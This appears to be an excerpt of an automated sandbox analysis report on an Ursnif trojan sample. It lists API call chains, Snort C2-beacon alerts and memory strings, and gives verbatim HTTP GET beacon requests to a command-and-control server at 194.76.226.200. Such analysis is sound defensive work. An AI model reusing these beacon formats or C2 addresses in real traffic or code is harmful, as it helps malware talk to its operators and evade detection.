Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_046CB190
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_046CB2F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_046DD39D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04BCB190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_04BCB2F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_04BDD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	4_2_05EAB190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	4_2_05EBD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	4_2_05EAB2F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_0511B190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_0512D39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_0511B2F7

Source: C:\Windows\System32\loaddll32.exe

1_2_046DFD82

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 194.76.226.200:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 194.76.226.200 80

Jump to behavior

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200

Source: rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/
Source: rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/BFA
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/M
Source: regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ
Source: rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o
Source: rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7
Source: rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2
Source: regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/mA
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/
Source: rundll32.exe, 00000004.00000003.356735881.0000000003341000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.358273332.0000000003341000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/KsjuChW1FlW/h0G2ROzQWge1fX/1C6hndXvCTbmXNKw7e4fr/CwqIDwnvxPyopc2J/
Source: regsvr32.exe, 00000003.00000003.363439458.000000000338B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.363565997.000000000338C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/tFFub3t73gQJ78QDkLr4/gr_2B_2BUJEeehBUVBY/ao0x4PCINZAsF2guaBcZS9/2c
Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000E.00000003.519774884.00000185EC638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip

Source: global traffic	HTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
